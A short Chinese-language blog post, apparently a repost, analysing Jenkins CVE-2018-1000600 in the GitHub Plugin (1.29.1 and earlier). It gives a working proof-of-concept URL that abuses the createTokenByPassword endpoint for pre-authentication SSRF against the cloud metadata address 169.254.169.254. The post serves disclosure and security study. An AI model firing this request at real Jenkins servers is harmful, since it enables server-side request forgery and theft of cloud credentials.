Jenkins CVE-2018-1000600漏洞利用与SSRF攻击分析

qife122
46 阅读1分钟

Jenkins - CVE-2018-1000600 PoC

来源博客文章
blog.orange.tw/2019/01/hac…

漏洞链利用
通过与CVE-2018-1000600链式结合,实现预认证完全响应SSRF攻击。
官方安全公告:jenkins.io/security/ad…

影响范围
该漏洞影响默认安装的GitHub插件,具体版本为GitHub Plugin 1.29.1及以下

PoC代码

http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
?apiUrl=http://169.254.169.254/%23
&login=orange
&password=tsai

标签
devops, jenkins, Pentesting
发布时间
2019年3月5日下午2:01
作者
CG

avatar
文章
阅读
粉丝